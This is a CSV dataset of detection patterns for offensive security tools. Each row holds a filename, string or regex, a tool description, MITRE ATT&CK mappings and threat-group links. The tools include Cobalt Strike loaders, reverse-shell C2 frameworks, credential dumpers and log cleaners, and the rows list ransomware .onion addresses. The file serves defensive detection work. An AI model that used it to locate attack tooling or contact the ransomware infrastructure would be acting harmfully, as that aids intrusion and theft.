"*python3??/PyLoader.py*",".{0,1000}python3\?\?\/PyLoader\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","56128"
"*python3_reverse_tcp.py*",".{0,1000}python3_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","56129"
"*python3_reverse_tcp_v2.py*",".{0,1000}python3_reverse_tcp_v2\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","56130"
"*pywerview.py*",".{0,1000}pywerview\.py.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","N/A","10","974","121","2025-03-17T14:04:51Z","2016-07-06T13:25:09Z","56131"
"*pywhisker.py -*",".{0,1000}pywhisker\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56132"
"*pywhisker.py*",".{0,1000}pywhisker\.py.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","56133"
"*pywhisker-main*",".{0,1000}pywhisker\-main.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","56134"
"*pywsus.py*",".{0,1000}pywsus\.py.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pywsus","1","1","N/A","network exploitation tool","N/A","4","303","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z","56135"
"*Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI=*",".{0,1000}Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","56136"
"*Q2s1UFgwbFFYMGhQVTFRZ1BTQW5aMjl2WjJ4bFkyaHliMjFsWVhWMGJ5NXpaWEoyWldseVl5NWpiMjBuQ2t4SVQxTlVJRDBnSnpFNU1pNHhOamd1TVM0ekp3cE1VRTlTVkNBOUlEUTBNd3BVU1UxRlgxTk1SVVZRSUQwZ01UQUtDbFJGVFZCZlVFRlVTQ0E5SUhSbGJYQm1hV3hsTG1kbGRIUmxiWEJrYVhJb0tRcFNSVWRmVUVGVVNDQTlJSElpVTI5bWRIZGhjbVZjVFdsa*",".{0,1000}Q2s1UFgwbFFYMGhQVTFRZ1BTQW5aMjl2WjJ4bFkyaHliMjFsWVhWMGJ5NXpaWEoyWldseVl5NWpiMjBuQ2t4SVQxTlVJRDBnSnpFNU1pNHhOamd1TVM0ekp3cE1VRTlTVkNBOUlEUTBNd3BVU1UxRlgxTk1SVVZRSUQwZ01UQUtDbFJGVFZCZlVFRlVTQ0E5SUhSbGJYQm1hV3hsTG1kbGRIUmxiWEJrYVhJb0tRcFNSVWRmVUVGVVNDQTlJSElpVTI5bWRIZGhjbVZjVFdsa.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","56137"
"*q7wp5u55lhtuafjtsl6lkt24z4wvon2jexfzhzqqfrt3bqnpqboyqoid.onion*",".{0,1000}q7wp5u55lhtuafjtsl6lkt24z4wvon2jexfzhzqqfrt3bqnpqboyqoid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56139"
"*QAX-A-Team/BrowserGhost*",".{0,1000}QAX\-A\-Team\/BrowserGhost.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","1","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","56140"
"*QAX-A-Team/EventCleaner*",".{0,1000}QAX\-A\-Team\/EventCleaner.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","56141"
"*QAX-A-Team/EventLogMaster*",".{0,1000}QAX\-A\-Team\/EventLogMaster.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","1","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","56142"
"*qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion*",".{0,1000}qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56143"
"*Qd7SkrRYaGMvOlLz1Qyk3A*",".{0,1000}Qd7SkrRYaGMvOlLz1Qyk3A.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#content","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","56144"
"*qkbbaxiuqqcqb5nox4np4qjcniy2q6m7yeluvj7n5i5dn7pgpcwxwfid.onion*",".{0,1000}qkbbaxiuqqcqb5nox4np4qjcniy2q6m7yeluvj7n5i5dn7pgpcwxwfid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56145"
"*qmnmrba4s4a3py6z.onion*",".{0,1000}qmnmrba4s4a3py6z\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56146"
"*QmVuamFtaW4gREVMUFk=*",".{0,1000}QmVuamFtaW4gREVMUFk\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","56147"
"*QmVuamFtaW4gREVMUFk=*",".{0,1000}QmVuamFtaW4gREVMUFk\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","56148"
"*qn.support@cyberfear.com*",".{0,1000}qn\.support\@cyberfear\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56149"
"*QSBMYSBWaWUsIEEgTCdBbW91cg==*",".{0,1000}QSBMYSBWaWUsIEEgTCdBbW91cg\=\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","56151"
"*QSBMYSBWaWUsIEEgTCdBbW91cg==*",".{0,1000}QSBMYSBWaWUsIEEgTCdBbW91cg\=\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","56152"
"*qtc-de/remote-method-guesser*",".{0,1000}qtc\-de\/remote\-method\-guesser.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","56153"
"*quantum-mirror.hu/mirrors/pub/blackarch/*/os/*",".{0,1000}quantum\-mirror\.hu\/mirrors\/pub\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","56154"
"*QUAPCInjectAsSystem*",".{0,1000}QUAPCInjectAsSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","56155"
"*QUAPCInjectElevated*",".{0,1000}QUAPCInjectElevated.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","56156"
"*QUAPCInjectFakecmd*",".{0,1000}QUAPCInjectFakecmd.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","56157"
"*QUAPCInjectFakecmd*",".{0,1000}QUAPCInjectFakecmd.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","56158"
"*QUAPCInjectWithoutPid*",".{0,1000}QUAPCInjectWithoutPid.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","56159"
"*QuarksADDumper*",".{0,1000}QuarksADDumper.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","1","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","56160"
"*quarkslab/quarkspwdump*",".{0,1000}quarkslab\/quarkspwdump.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","1","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","56161"
"*quarks-pwdump.exe*",".{0,1000}quarks\-pwdump\.exe.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","1","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","56162"
"*quarks-pwdump.exe*",".{0,1000}quarks\-pwdump\.exe.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","1","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","56163"
"*quentinhardy*msdat*",".{0,1000}quentinhardy.{0,1000}msdat.{0,1000}","offensive_tool_keyword","MSDAT","MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.","T1110 - T1059 - T1210 - T1047","TA0002 - TA0008 - TA0001","N/A","N/A","Exploitation tool","https://github.com/quentinhardy/msdat","1","1","N/A","N/A","N/A","10","909","144","2023-08-01T10:54:24Z","2018-02-15T12:34:57Z","56176"
"*Query-ExploitGuardProtectionHistory *",".{0,1000}Query\-ExploitGuardProtectionHistory\s.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","N/A","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","56177"
"*queue.localtonet.com*",".{0,1000}queue\.localtonet\.com.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","56178"
"*Quiet Riot discovered one valid e-mail account*",".{0,1000}Quiet\sRiot\sdiscovered\sone\svalid\se\-mail\saccount.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","56180"
